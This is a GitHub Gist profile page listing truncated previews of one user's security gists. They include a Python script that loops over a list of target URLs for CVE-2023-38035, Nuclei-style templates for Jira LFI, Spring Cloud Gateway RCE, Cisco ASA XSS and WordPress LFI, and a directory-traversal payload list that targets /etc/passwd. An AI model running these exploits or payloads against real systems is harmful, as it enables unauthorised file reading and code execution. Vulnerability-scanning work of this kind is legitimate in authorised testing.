Skip to content

Instantly share code, notes, and snippets.

View 0x240x23elu's full-sized avatar
😃
https://github.com/0x240x23elu/status/blob/main/README.md

0x240x23elu

😃
https://github.com/0x240x23elu/status/blob/main/README.md
View GitHub Profile
@0x240x23elu
0x240x23elu / CVE-2023-38035.py
Created August 30, 2023 13:57
CVE-2023-38035
import ssl
from pyhessian.client import HessianProxy as H
# Disable SSL certificate verification globally for the Python process
ssl._create_default_https_context = ssl._create_unverified_context
# Read the list of URLs from the file
url_list = open('final.txt').readlines()
for url1 in url_list:
@0x240x23elu
0x240x23elu / CVE-2023-26255.yaml
Created August 26, 2023 02:22
CVE-2023-26255
id: CVE-2023-26255
info:
name: Stagil navigation for jira - Local File Inclusion
author: 0x240x23elu
severity: high
description: Prior to version 2.0.52 of the “Stagil navigation for jira – Menù & Themes", the fileName parameter is vulnerable to a "Directory Traversal" that would allow an attacker to read files on the server knowing their path
reference:
- https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26255.md
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
@0x240x23elu
0x240x23elu / gist:90f01e21fba53fae9654215ea49c709a
Created April 25, 2023 16:25
vmware_Log_Insight panel detection
id: vmware_Log_Insight
info:
name: Vmare_Log_Insight
author: 0x240x23elu
severity: info
description: Vmare_Log_Insight_Panel
reference:
- https://
tags: vmware,Panel
@0x240x23elu
0x240x23elu / CVE-2022-22947.yaml
Last active December 12, 2023 02:12
CVE-2022-22947
id: CVE-2022-22947
info:
name: CVE-2022-22947
author: 0x240x23elu
severity: critical
description: Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)
reference:
- https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947
tags: cve,cve2022,rce,spring
id: spring-cloud
info:
name: spring-cloud Exposure
author: 0x240x23elu
severity: info
tags: panel,spring-cloud
requests:
- method: GET
id: Synology
info:
name: Synology
author: 0x240x23elu
severity: info
tags: panel
requests:
- method: GET
id: CVE-2020-3580
info:
name: xss in cisco ASA
author: 0x240x23elu
severity: high
description: xss in cisco ASA
tags: cve,cve2020,cisco
requests:
@0x240x23elu
0x240x23elu / traversals-8-deep-exotic-encoding.txt
Created February 23, 2021 05:20
traversals-8-deep-exotic-encoding.txt
/../etc/passwd
/../../etc/passwd
/../../../etc/passwd
/../../../../etc/passwd
/../../../../../etc/passwd
/../../../../../../etc/passwd
/../../../../../../../etc/passwd
/../../../../../../../../etc/passwd
/..%2fetc/passwd
/..%2f..%2fetc/passwd
@0x240x23elu
0x240x23elu / CVE_RCE2-1.yaml
Created February 23, 2021 05:18
CVE_RCE2-1
id: CVE_RCE2-1
info:
name: CVE_RCE2
author: 0x240x23elu
severity: high
requests:
- payloads:
dirt: /mnt/d/tools/alltest/myopen/payload/PayloadsAllTheThings/DirectoryTraversal/Intruder/traversals-8-deep-exotic-encoding.txt
@0x240x23elu
0x240x23elu / wordpress-LFI.yaml
Created February 23, 2021 05:03
wordpress-LFI
id: wordpress-LFI
info:
name: wordpress-LFI
author: 0x240x23elu
severity: High
requests:
- method: GET
path: